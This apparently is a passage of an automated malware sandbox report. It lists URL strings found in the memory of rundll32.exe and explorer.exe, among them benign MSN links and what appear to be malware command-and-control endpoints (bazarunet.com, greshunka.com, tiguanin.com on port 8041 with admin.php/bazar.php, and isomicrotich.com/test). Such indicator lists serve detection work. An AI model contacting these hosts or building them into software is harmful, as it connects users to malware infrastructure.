                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/%
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php
                  Source: rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php1
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php=
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpN
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php1
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php;
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpV
                  Source: rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpm
                  Source: rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/p
                  Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
                  Source: explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/vi
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/~i
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/)
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/0
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/E
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/M
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php1
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2367085005.0000029F3B82E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpQ
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpad
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpn
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpo
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2372533125.0000029F3BE20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php.
                  Source: rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpad
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpy
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/net.com:8041/0
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000BEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/a
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/&
                  Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/H
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/T
                  Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/a
                  Source: explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/ons
                  Source: explorer.exe, 0000001E.00000002.2586707212.000000000841D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/zi
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/0
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/;
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/E
                  Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/N
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php
                  Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpA
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpN
                  Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpW
                  Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpte
                  Source: rundll32.exe, 00000017.00000002.2575784572.0000029F39CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpk
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.phpn
                  Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/in.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/in.com:8041/bazar.php
                  Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/net.com:8041/
                  Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/p
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000001E.00000000.1578935505.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.2292493778.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
                  Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
                  Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
